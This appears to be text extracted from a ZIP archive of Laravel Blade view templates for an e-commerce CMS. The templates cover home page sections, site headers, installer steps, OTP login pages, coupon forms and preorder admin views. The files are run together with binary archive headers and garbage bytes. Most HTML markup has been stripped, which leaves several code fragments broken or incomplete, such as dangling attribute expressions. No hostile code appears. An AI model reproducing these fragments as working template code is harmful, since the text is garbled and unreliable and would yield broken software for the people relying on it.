    @endif @php $mainCategories = json_decode(get_setting('main_categories'), true) ?? []; $childCategories = json_decode(get_setting('child_categories'), true) ?? []; @endphp @if (get_setting('enable_categories') == 1 && count($mainCategories) > 0)
    @foreach ($mainCategories as $key => $mainCategoryId) @php $mainCategory = \App\Models\Category::find($mainCategoryId); if (!$mainCategory) { continue; } $selectedChildIds = $childCategories[$key] ?? []; $selectedChildren = \App\Models\Category::whereIn('id', $selectedChildIds)->get(); @endphp
    {{ $mainCategory->getTranslation('name') }}
    @foreach ($selectedChildren as $childCategory) @endforeach
    @endforeach
    @endif @if (get_setting('enable_auction_products') == 1) @if (addon_is_activated('auction'))
    @endif @endif @if (get_setting('enable_classified_products') == 1) @if (get_setting('classified_product') == 1) @php $classified_products = get_home_page_classified_products(); $classified_title_sub_text = get_setting('classified_title_sub_text', null); @endphp @if (count($classified_products) > 0)
    {{ translate('Classified Ads') }}
    {{ $classified_title_sub_text }}
    @endif @endif @endif @if (get_setting('enable_banner_2') == 1) @php $homeBanner2Images = get_setting('home_banner2_images', null, $lang); @endphp @if ($homeBanner2Images != null) @php $banner_2_images = json_decode($homeBanner2Images, true) ?? []; $data_md = count($banner_2_images) >= 2 ? 2 : 1; $home_banner2_links = get_setting('home_banner2_links', null, $lang); @endphp @endif @endif @if (get_setting('enable_preorder_products') == 1) @if (addon_is_activated('preorder')) @php $newest_preorder_products = \App\Models\PreorderProduct::where('is_published', 1) ->where(function ($query) { $query->whereHas('user', function ($q) { $q->where('user_type', 'admin'); })->orWhereHas('user.shop', function ($q) { $q->where('verification_status', 1); }); }) ->latest() ->limit(12) ->get(); $preorder_title_sub_text = get_setting('preorder_title_sub_text', null); @endphp @if (count($newest_preorder_products) > 0)
    {{ translate('Preorder Products') }}
    {{ $preorder_title_sub_text }}
    @php $newest_preorder_banner_image = get_setting('newest_preorder_banner_image', null, $lang); $newest_preorder_banner_image_small = get_setting('newest_preorder_banner_image_small', null, $lang); @endphp
    @endif @endif @endif @if (get_setting('enable_shop_by_seller') == 1 || get_setting('enable_shop_by_brand') == 1)
    @if (get_setting('vendor_system_activation') == 1 && get_setting('enable_shop_by_seller') == 1 ) @php $best_selers = get_best_sellers(6); $shop_by_seller_title_sub_text = get_setting('shop_by_seller_title_sub_text', null); @endphp @if (count($best_selers) > 0) @endif @endif @if (get_setting('top_brands') != null && get_setting('enable_shop_by_brand') == 1 ) @php $shop_by_brand_title_sub_text = get_setting('shop_by_brand_title_sub_text', null); @endphp
    {{ translate('Shop by Brands') }}
    {{ $shop_by_brand_title_sub_text }}
    {{--
    --}} @php $top_brands = json_decode(get_setting('top_brands')); $brands = get_brands($top_brands); $shop_by_brand_title_sub_text = get_setting('shop_by_brand_title_sub_text', null); @endphp {{-- @foreach ($brands as $brand) @endforeach --}} {{--
    --}}
    @endif
    @endif @if (get_setting('enable_banner_3') == 1) @php $homeBanner3Images = get_setting('home_banner3_images', null, $lang); @endphp @if ($homeBanner3Images != null) @endif @php $smallHomeBanner3Images = get_setting('small_home_banner3_images', null, $lang); @endphp @if ($smallHomeBanner3Images != null) @endif @endif
    @endsection @section('script') @endsection PK�N]��w�> > ;views/frontend/nexa/partials/best_sellers_section.blade.phpnu�[���@if (get_setting('vendor_system_activation') == 1)

    {{ translate('Best Sellers')}}

    {{ translate('View All Sellers') }}
    @endif PK�N]��[-  ;views/frontend/nexa/partials/best_selling_section.blade.phpnu�[���@php $best_selling_products = get_best_selling_products(20); @endphp @if (get_setting('best_selling') == 1 && count($best_selling_products) > 0)

    {{ translate('Best Selling') }}

    View All
    @endifPK�N]���r4views/frontend/nexa/partials/category_menu.blade.phpnu�[���
      @foreach (get_level_zero_categories()->take(10) as $key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    • {{ $category_name }} {{ $category_name }}
    • @endforeach
    PK�N]0?'���8views/frontend/nexa/partials/featured_products.blade.phpnu�[��� @if (count(get_featured_products()) > 0)
    @endifPK�N]̏X�cc@views/frontend/nexa/partials/featured_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0)

    {{ translate('Featured Products') }}

    @endifPK�N]g��O. . >views/frontend/nexa/partials/home_categories_section.blade.phpnu�[���@if (get_setting('home_categories') != null) @php $home_categories = json_decode(get_setting('home_categories')); $categories = get_category($home_categories); @endphp @foreach ($categories as $category_key => $category) @php $category_name = $category->getTranslation('name'); @endphp
    @endforeach @endifPK�N]�֕�%�%7views/frontend/nexa/partials/home_product_box.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp
    @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif
    @if ($product->auction_product == 0)
    @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) @else @endif
    @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @if ($product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif @endif
    {{ $product->getTranslation('name') }} @if ($product->auction_product == 0)

    {{ home_discounted_base_price($product) }} @if (home_base_price($product) != home_discounted_base_price($product)) {{ home_base_price($product) }} @endif

    @endif @if ($product->auction_product == 1)

    {{ single_price($product->starting_bid) }}

    @endifPK�N]��iȝ�>views/frontend/nexa/partials/last_view_product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @endif @if ($product->auction_product == 0) @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�eaa>views/frontend/nexa/partials/newest_products_section.blade.phpnu�[���@if (count($newest_products) > 0) @if(request()->page == null || request()->page == 1)
    @endif @foreach ($newest_products as $index => $new_product)
    @include('frontend.' . get_setting('homepage_select') . '.partials.home_product_box', [ 'product' => $new_product ])
    @endforeach @if(request()->page == null || request()->page == 1)
    @endif @endifPK�N]�|z��@views/frontend/nexa/partials/preorder_products_section.blade.phpnu�[���@if (count(get_featured_products()) > 0) @php $lang = get_system_language()->code; $homeBanner1Images = get_setting('featuredPreorder_images', null, $lang); $xxl_items = 6; $xl_items = 5; $lg_items = 4; $md_items = 3; if($homeBanner1Images != null){ $xxl_items = 5; $xl_items = 3.5; $lg_items = 3; $md_items = 1.5; } @endphp
    @if ($homeBanner1Images != null)
    @php $banner_1_imags = json_decode($homeBanner1Images); $home_banner1_links = get_setting('home_banner1_links', null, $lang); @endphp
    @endif
    @endifPK�N]�3x�0�04views/frontend/nexa/partials/product_box_1.blade.phpnu�[���@php $cart_added = []; @endphp
    @php $product_url = route('product', $product->slug); if ($product->auction_product == 1) { $product_url = route('auction-product', $product->slug); } @endphp {{ $product->getTranslation('name') }} {{ $product->getTranslation('name') }} @php $badgeIndex = 0; @endphp @if (discount_in_percentage($product) > 0) -{{ discount_in_percentage($product) }}% @php $badgeIndex++; @endphp @endif @if ($product->wholesale_product) {{ translate('Wholesale') }} @php $badgeIndex++; @endphp @endif @php $customLabels = get_custom_labels($product->custom_label_id); @endphp @if ($customLabels) @foreach ($customLabels as $key => $customLabel) {{ $customLabel->text }} @php $badgeIndex++; @endphp @endforeach @endif @if ($product->auction_product == 0) @php $colors = is_string($product->colors) ? json_decode($product->colors, true) : $product->colors; $attributes = is_string($product->attributes) ? json_decode($product->attributes, true) : $product->attributes; @endphp @if ( (is_array($colors) && count($colors) > 0) || (is_array($attributes) && count($attributes) > 0) ) {{ translate('Select Option') }} @else {{ translate('Add to Cart') }} @endif @endif @if ( $product->auction_product == 1 && $product->auction_start_date <= strtotime('now') && $product->auction_end_date >= strtotime('now')) @php $carts = get_user_cart(); if (count($carts) > 0) { $cart_added = $carts->pluck('product_id')->toArray(); } $highest_bid = $product->bids->max('amount'); $min_bid_amount = $highest_bid != null ? $highest_bid + 1 : $product->starting_bid; $gst_rate = gst_applicable_product_rate($product->id); @endphp {{ translate('Place Bid') }} @endif

    {{ $product->getTranslation('name') }}

    @if ($product->auction_product == 0) @if (home_base_price($product) != home_discounted_base_price($product))
    {{ home_base_price($product) }}
    @endif
    {{ home_discounted_base_price($product) }}
    @endif @if ($product->auction_product == 1)
    {{ single_price($product->starting_bid) }}
    @endif
    PK�N]�dP5 5 2views/frontend/nexa/partials/todays_deal.blade.phpnu�[��� @if (count($todays_deal_products) > 0)

    {{ translate('Todays Deal') }}

    View All
    @endif PK�N]�{;6�6�views/header/header1.blade.phpnu�[���@php $topHeaderTextColor = get_setting('top_header_text_color'); $middleHeaderTextColor = get_setting('middle_header_text_color'); $bottomHeaderTextColor = get_setting('bottom_header_text_color'); @endphp
    @if (Auth::check() && auth()->user()->user_type == 'customer')
    @include('frontend.partials.compare')
    @include('frontend.partials.wishlist')
    @endif
    @auth @else @endauth
    @if (get_setting('megamenu_element') == 11)
    @else
    {{ translate('Categories') }} ({{ translate('See All') }})
    @endif
      @if (get_setting('header_menu_labels') != null) @foreach (json_decode(get_setting('header_menu_labels'), true) as $key => $value)
    • {{ translate($value) }}
    • @endforeach @endif
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    PK�N]��ԇ$�$�views/header/header2.blade.phpnu�[���@php $topHeaderTextColor = get_setting('top_header_text_color'); $middleHeaderTextColor = get_setting('middle_header_text_color'); $bottomHeaderTextColor = get_setting('bottom_header_text_color'); @endphp
    @if (Auth::check() && auth()->user()->user_type == 'customer')
    @include('frontend.partials.compare')
    @include('frontend.partials.wishlist')
    @endif
    @auth @else @endauth
    @if (get_setting('megamenu_element') == 11)
    @else
    {{ translate('Categories') }} ({{ translate('See All') }})
    @endif
      @if (get_setting('header_menu_labels') != null) @foreach (json_decode(get_setting('header_menu_labels'), true) as $key => $value)
    • {{ translate($value) }}
    • @endforeach @endif
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    PK�N]:�������views/header/header3.blade.phpnu�[���@php $topHeaderTextColor = get_setting('top_header_text_color'); $middleHeaderTextColor = get_setting('middle_header_text_color'); $bottomHeaderTextColor = get_setting('bottom_header_text_color'); @endphp
    @if (Auth::check() && auth()->user()->user_type == 'customer')
    @include('frontend.partials.compare')
    @include('frontend.partials.wishlist')
    @endif
    @auth @else @endauth
    @if (get_setting('megamenu_element') == 11)
    @else
    {{ translate('Categories') }} ({{ translate('See All') }})
    @endif
      @if (get_setting('header_menu_labels') != null) @foreach (json_decode(get_setting('header_menu_labels'), true) as $key => $value)
    • {{ translate($value) }}
    • @endforeach @endif
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    PK�N]�hf:K�K�views/header/header4.blade.phpnu�[���@php $topHeaderTextColor = get_setting('top_header_text_color'); $middleHeaderTextColor = get_setting('middle_header_text_color'); $bottomHeaderTextColor = get_setting('bottom_header_text_color'); @endphp
    @if (Auth::check() && auth()->user()->user_type == 'customer')
    @include('frontend.partials.compare')
    @include('frontend.partials.wishlist')
    @endif
    @auth @else @endauth
    @if (get_setting('megamenu_element') == 11)
    @else
    {{ translate('Categories') }} ({{ translate('See All') }})
    @endif
      @if (get_setting('header_menu_labels') != null) @foreach (json_decode(get_setting('header_menu_labels'), true) as $key => $value)
    • {{ translate($value) }}
    • @endforeach @endif
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    PK�N]$�_aaviews/header/header5.blade.phpnu�[���@php $topHeaderTextColor = get_setting('top_header_text_color'); $middleHeaderTextColor = get_setting('middle_header_text_color'); @endphp
    • @if (get_setting('helpline_number'))
      {{ translate('Helpline') }}: {{ get_setting('helpline_number') }}
      @else
      @endif @if (Auth::check() && auth()->user()->user_type == 'customer')
      @include('frontend.partials.compareText')
      @include('frontend.partials.wishlistText')
      @endif
    @if (get_setting('megamenu_element') == 12)
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    @else
    @endif
      @if (get_setting('header_menu_labels') != null) @php $menuLabels = json_decode(get_setting('header_menu_labels'), true); $menuLinks = json_decode(get_setting('header_menu_links'), true); $totalMenus = count($menuLabels); @endphp @foreach ($menuLabels as $key => $value) @if ($loop->index < 5)
    • {{ translate($value) }}
    • @endif @if ($loop->index == 5 && $totalMenus > 5) @endif @endforeach @endif
    @auth @else @endauth
    PK�N]!V��/�/�views/header/header6.blade.phpnu�[���@php $topHeaderTextColor = get_setting('top_header_text_color'); $bottomHeaderTextColor = get_setting('bottom_header_text_color'); @endphp
    @auth @else @endauth
    @if (get_setting('megamenu_element') == 11)
    @else
    @endif
      @if (get_setting('header_menu_labels') != null) @foreach (json_decode(get_setting('header_menu_labels'), true) as $key => $value)
    • {{ translate($value) }}
    • @endforeach @endif
    @include('frontend.' . get_setting('homepage_select') . '.partials.category_menu')
    PK�N]��x ��views/header/header7.blade.phpnu�[���@php $topHeaderbgColor = get_setting('top_header_bg_color'); $topHeaderTextColor = get_setting('top_header_text_color'); @endphp
    @php $header_logo = get_setting('header_logo'); @endphp
    @if (Auth::check() && auth()->user()->user_type == 'customer')
    @endif @auth @else @endauth
    {{-- --}} PK�N]�W*LL#views/installation/common.blade.phpnu�[���
    PK�N]��{��2�2"views/installation/step0.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')

    ACTIVE ECOMMERCE CMS INSTALLATION

    You will need to know the following items before proceeding

    1. Codecanyon purchase code
    2. Database Name
    3. Database Username
    4. Database Password
    5. Database Hostname

    During the installation process, we will check if the files that are needed to be written (.env file) have write permission. We will also check if curl are enabled on your server or not.

    Gather the information mentioned above before hitting the start installation button. If you are ready….

    @include('installation.common')
    @endsection PK�N]

    CHECKING FILE PERMISSIONS

    We ran diagnosis on your server. Review the items that have a red mark on it.
    If everything is green, you are good to go to the next step.

    • Php version 8.2 @php $phpVersion = number_format((float)phpversion(), 2, '.', ''); @endphp @if ($phpVersion >= 8.2) @else @endif
    • Curl Enabled @if ($permission['curl_enabled']) @else @endif
    • .env File Permission @if ($permission['db_file_write_perm']) @else @endif
    • RouteServiceProvider.php File Permission @if ($permission['routes_file_write_perm']) @else @endif

    Note: Go to your server and find the php extension/package and disable pdo_mysql then enable nd_mysqli and nd_pdo_mysql both for preventing value convert issue like an integer to string.

    @if ($permission['curl_enabled'] == 1 && $permission['db_file_write_perm'] == 1 && $permission['routes_file_write_perm'] == 1 && $phpVersion >= 7.20) @if ($_SERVER['SERVER_NAME'] == 'localhost' || $_SERVER['SERVER_NAME'] == '127.0.0.1') Go To Next Step @else Go To Next Step @endif @endif

    @include('installation.common')
    @endsection PK�N]��[}�(�("views/installation/step2.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')

    Purchase Code

    Provide your codecanyon purchase code.
    Where to get purchase code?

    @csrf

    After activating the application you will get the system key.

    @include('installation.common')
    @endsection PK�N]M{�Hl$l$"views/installation/step3.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')

    Database setup

    Fill this form with valid database credentials

    @if (isset($error))
    Invalid Database Credentials!! Please check your database credentials carefully
    @endif
    @csrf
    @php $route = ($_SERVER['SERVER_NAME'] == 'localhost' || $_SERVER['SERVER_NAME'] == '127.0.0.1') ? route('step1') : route('step2') @endphp
    @include('installation.common')
    @endsection PK�N]�$Q�,�,"views/installation/step4.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')

    Import SQL

    Your database is successfully connected. All you need to do now is hit the ‘Install’ Button. The auto installer will run a sql file, will do all the tiresome works and set up your application automatically.

    N.B: If you do not import the demo data now, you will not be able to access it later unless you perform a fresh installation

    @include('installation.common')
    @endsection @section('script') @endsection PK�N]�9�!!"views/installation/step5.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')

    Active eCommerce CMS Settings

    Fill this form with basic information & admin login credentials

    @csrf
    @include('installation.common')
    @endsection PK�N]GdX��,�,"views/installation/step6.blade.phpnu�[���@extends('backend.layouts.blank') @section('content')

    Congratulations!!!

    You have successfully completed the installation process. Please Login to continue.

    Configure the following setting to run the system properly.

    • SMTP Setting
    • Payment Method Configuration
    • Social Media Login Configuration
    • Facebook Chat Configuration

    Demo account added for test purpose.

    @include('installation.common')
    @endsection PK�N]*2h&h&(views/modals/bulk_action_modal.blade.phpnu�[���PK�N]weLA� � (views/modals/bulk_delete_modal.blade.phpnu�[���PK�N]��4  #views/modals/delete_modal.blade.phpnu�[��� PK�N]!Pi  $views/modals/loading_modal.blade.phpnu�[��� PK�N]�}�Ĵ�!views/modals/note_modal.blade.phpnu�[���PK�N]O@���,views/modals/products_select_modal.blade.phpnu�[���PK�N]~��+views/modals/product_select_modal.blade.phpnu�[���PK�N]�)q,views/modals/size_chart_show_modal.blade.phpnu�[��� PK�N]�JJ)views/offcanvas/right_offcanvas.blade.phpnu�[���
    {{translate('Product Details')}}

    PK�N]�C}� � 6views/offcanvas/products_select_right_canvas.blade.phpnu�[���
    {{translate('Add Product In POS')}}
    PK�N]�LL�11@views/otp_systems/frontend/auth/boxed/otp_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Customer Login Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('OTP Verification')}}

    {{ translate('Enter the verification code which we sent to your given phone number') }}( {{ $phone }})
    @csrf
    @endsection @section('script') @endsectionPK�N]�^� FF@views/otp_systems/frontend/auth/boxed/reset_with_phone.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Customer Login Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('Reset Password')}}

    {{ translate('Enter your phone, code and new password and confirm password.')}}
    @csrf
    @if ($errors->has('email')) {{ $errors->first('email') }} @endif
    @if ($errors->has('password')) {{ $errors->first('password') }} @endif
    @endsection PK�N]=�Y�LLAviews/otp_systems/frontend/auth/boxed/user_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Phone Number Verify Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('Phone Verification')}}

    {{ translate('Verification code has been sent. Please wait a few minutes.')}}
    {{translate('Resend Code')}}
    @csrf
    @endsection PK�N]HB�E��Bviews/otp_systems/frontend/auth/focused/otp_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Phone Number Verify Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('OTP Verification')}}

    {{ translate('Enter the verification code which we sent to your given phone number') }}( {{ $phone }})
    @csrf
    @endsection @section('script') @endsection PK�N]Uh���Bviews/otp_systems/frontend/auth/focused/reset_with_phone.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Customer Login Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('Reset Password')}}

    {{ translate('Enter your phone, code and new password and confirm password.')}}
    @csrf
    @if ($errors->has('email')) {{ $errors->first('email') }} @endif
    @if ($errors->has('password')) {{ $errors->first('password') }} @endif
    {{ translate('Back to Previous Page')}}
    @endsection PK�N]�b����Cviews/otp_systems/frontend/auth/focused/user_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Phone Number Verify Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('Phone Verification')}}

    {{ translate('Verification code has been sent. Please wait a few minutes.')}}
    @endsection PK�N]��z�cc?views/otp_systems/frontend/auth/free/otp_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Phone Number Verify Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('OTP Verification')}}

    {{ translate('Enter the verification code which we sent to your given phone number') }}( {{ $phone }})
    @csrf
    @endsection @section('script') @endsectionPK�N]��Mq[[?views/otp_systems/frontend/auth/free/reset_with_phone.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Customer Login Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('Reset Password')}}

    {{ translate('Enter your phone, code and new password and confirm password.')}}
    @csrf
    @if ($errors->has('email')) {{ $errors->first('email') }} @endif
    @if ($errors->has('password')) {{ $errors->first('password') }} @endif
    {{ translate('Back to Previous Page')}}
    @endsectionPK�N]4S{uu@views/otp_systems/frontend/auth/free/user_verification.blade.phpnu�[���@extends('auth.layouts.authentication') @section('content')
    {{ translate('Phone Number Verify Page Image') }}
    {{ translate('Site Icon')}}

    {{ translate('Phone Verification')}}

    {{ translate('Verification code has been sent. Please wait a few minutes.')}}
    @endsectionPK�N]MFA"331views/partials/coupons/cart_base_coupon.blade.phpnu�[���

    {{translate('Add Your Cart Base Coupon')}}

    PK�N]�ԑ�� � 6views/partials/coupons/cart_base_coupon_edit.blade.phpnu�[���@php $coupon_det = json_decode($coupon->details); @endphp

    {{translate('Edit Your Cart Base Coupon')}}

    @php $start_date = date('m/d/Y', $coupon->start_date); $end_date = date('m/d/Y', $coupon->end_date); @endphp
    PK�N]�� ȿ � 4views/partials/coupons/product_base_coupon.blade.phpnu�[���

    {{translate('Add Your Product Base Coupon')}}

    PK�N]�ؓ�ww9views/partials/coupons/product_base_coupon_edit.blade.phpnu�[���@php $couponDetails = json_decode($coupon->details, true) ?? []; $selectedIds = array_column($couponDetails, 'product_id'); $selectedProducts = \App\Models\Product::whereIn('id', $selectedIds)->get()->keyBy('id'); @endphp

    {{translate('Edit Your Product Base Coupon')}}

    0 ? '' : 'style=display:none;' }}>
    @foreach($selectedIds as $pid) @if(isset($selectedProducts[$pid])) @php $p = $selectedProducts[$pid]; @endphp @endif @endforeach
    {{ translate('Product') }} {{ translate('Price') }} {{ translate('Action') }}
    {{ $p->getTranslation('name') }}
    {{ single_price($p->unit_price) }}
    PK�N] d���4views/partials/coupons/welcome_base_coupon.blade.phpnu�[���

    {{translate('Add Your Customer Welcome Coupon')}}

    {{ translate('Days') }}
    PK�N]lw��  9views/partials/coupons/welcome_base_coupon_edit.blade.phpnu�[���@php $coupon_details = json_decode($coupon->details); @endphp

    {{translate('Edit Your Customer Welcome Coupon')}}

    {{ translate('Days') }}
    PK�N]����228views/partials/coupons/seller/cart_base_coupon.blade.phpnu�[���

    {{translate('Add Your Cart Base Coupon')}}

    PK�N]����� � =views/partials/coupons/seller/cart_base_coupon_edit.blade.phpnu�[���@php $coupon_det = json_decode($coupon->details); @endphp

    {{translate('Edit Your Cart Base Coupon')}}

    @php $start_date = date('m/d/Y', $coupon->start_date); $end_date = date('m/d/Y', $coupon->end_date); @endphp
    PK�N]�� Wii;views/partials/coupons/seller/product_base_coupon.blade.phpnu�[���

    {{translate('Add Your Product Base Coupon')}}


    PK�N]�(^1  @views/partials/coupons/seller/product_base_coupon_edit.blade.phpnu�[���
    {{translate('Add Your Product Base Coupon')}}
    @php $start_date = date('m/d/Y', $coupon->start_date); $end_date = date('m/d/Y', $coupon->end_date); @endphp
    PK�N]�Z���/views/partials/online_payment_options.blade.phpnu�[���@foreach (get_activate_payment_methods() as $payment_method) @endforeach PK�N]n��/��Cviews/partials/product/frequently_bought_selected_product.blade.phpnu�[���
    @if(count($products) > 0) @foreach($products as $product) @endforeach @endif
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $product->getTranslation('name') }}

    {{ $product->main_category->name ?? translate('Category Not Found') }}
    PK�N]Ԩ���Dviews/partials/product/frequently_brought_selected_product.blade.phpnu�[���
    @if(count($products) > 0) @foreach($products as $product) @endforeach @endif
    {{ translate('Product Thumb') }} {{ translate('Product Name') }} {{ translate('Category') }} {{ translate('Options') }}

    {{ translate('Image')}}

    {{ $product->getTranslation('name') }}

    {{ $product->main_category->name ?? translate('Category Not Found') }}
    PK�N]��蘭�3views/partials/product/multiPick_products.blade.phpnu�[���
    PK�N]9(����0views/partials/product/products_search.blade.phpnu�[���@if(count($products) > 0) @php $select_type = $single_select ? 'radio' : 'checkbox'; $name = $single_select ? 'selected_product_id' : 'selected_product_id[]'; $pos = isset($pos) ? $pos : 0; $pos_check = $pos == 1 ? 1 : 0; @endphp @foreach ($products as $key => $product) pos == 1) class="pos-selected-tr" @endif> @endforeach
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]���7LL/views/partials/product/product_search.blade.phpnu�[���@if(count($products) > 0) @foreach ($products as $key => $product) @endforeach
    {{ $product->getTranslation('name') }}
    {{ single_price($product->unit_price) }}
    @endifPK�N]7H��==2views/partials/product/product_temp_data.blade.phpnu�[���PK�N] �F�QQ9views/preorder/backend/commission_history/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Preorder Commission History report')}}

    {{ translate('Commission History') }}
    @foreach ($commission_history as $key => $history) @endforeach
    # {{ translate('Order Code') }} {{ translate('Admin Commission') }} {{ translate('Seller Earning') }} {{ translate('Created At') }}
    {{ ($key+1) }} {{ $history->preorder ? $history->preorder->order_code : translate('Order Not Found') }} {{ $history->admin_commission }} {{ $history->seller_earning }} {{ $history->created_at }}
    {{ $commission_history->appends(request()->input())->links() }}
    @endsection @section('script') @endsectionPK�N]!t8�ff4views/preorder/backend/conversations/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{translate('Conversations')}}
    @foreach ($conversations as $key => $conversation) @endforeach
    # {{ translate('Date') }} {{translate('Title')}} {{translate('Sender')}} {{translate('Receiver')}} {{translate('Options')}}
    {{$key+1}} {{ $conversation->created_at }} {{ $conversation->title }} @if($conversation->sender != null) {{ $conversation->sender?->name }} @php $customerUnreadConversations = $conversation->messages()->where('sender_id', '!=' , $conversation->sender_id)->whereReceiverViewed(0)->count(); @endphp @if ($customerUnreadConversations > 0) {{ $customerUnreadConversations }} @endif @else {{ translate('Customer Not Found') }} @endif @if($conversation->receiver != null) {{ $conversation->receiver?->name }} @php $customerUnreadConversations = $conversation->messages()->where('sender_id', '!=' , $conversation->receiver_id)->whereReceiverViewed(0)->count(); @endphp @if ($customerUnreadConversations > 0) {{ $customerUnreadConversations }} @endif @else {{ translate('Seller Not Found') }} @endif @can('view_detail_preorder_product_conversation') @endcan @can('delete_preorder_product_conversation') @endcan
    {{ $conversations->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]1Wp� � 3views/preorder/backend/conversations/show.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    #{{ $conversation->title.' ('.translate('Between').' '.$conversation->receiver?->name.' '.translate('and').' '.$conversation->sender?->name.')' }}
    {{ $conversation->preorderProduct->getTranslation('product_name') }}
      @foreach($conversation->messages as $message)
    • sender != null) src="{{ uploaded_asset($message->sender->avatar_original) }}" @endif onerror="this.onerror=null;this.src='{{ static_asset('assets/img/avatar-place.png') }}';">
      @if ($message->user != null) {{ $message->user?->name }} @endif

      {{$message->created_at}}

      {{ $message->message }}

    • @endforeach
    @if (($conversation->preorderProduct->user_id == get_admin()->id) && auth()->user()->can('reply_preorder_product_conversation'))
    @csrf

    @endif
    @endsection PK�N]ufE1P1P0views/preorder/backend/dashboard/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{-- Sales Stats --}}

    {{translate('Sales Stats')}}

    {{translate('All sales in pre order system')}}

    {{translate('In-house preorder sales')}}

    {{format_price($in_house_sales)}}

    {{translate('Sellers preorder sales')}}

    {{format_price($seller_sales) }}

    {{ translate('Sales this month') }}

    {{ single_price($totalSalesThisMonth) }}

    {{-- Order status --}}

    {{translate('Order Status')}}

    {{translate('Order status represents the delivery and order status of your preorders.')}}

    {{ translate('In Shipping') }}

    {{$in_shipping_orders}}

    {{ translate('Delivered') }}

    {{$is_delivered_orders}}

    {{-- Preorder States --}}

    {{ translate('Preorder States') }}

    {{ translate('All states of the preorder system up-to final order. All the states here has multiple actions.') }}

    {{ translate('Preorder Requests') }}

    {{ translate('Customers applied for a preorder product') }}

    {{$preorder_request_count}}

    {{ translate('Accepted Requests') }}

    {{ translate('Requests accepted & order profile created') }}

    {{$accepted_request_count}}

    {{ translate('Prepayment Requests') }}

    {{ translate('Prepayment Requests for admin to verify') }}

    {{$prepayment_request_count}}

    {{ translate('Confirmed Prepayments') }}

    {{ translate('Prepayments accepted by admin') }}

    {{$confirmed_prepayment_request_count}}

    {{ translate('Final Preorders') }}

    {{ translate('Completed orders of preorder products') }}

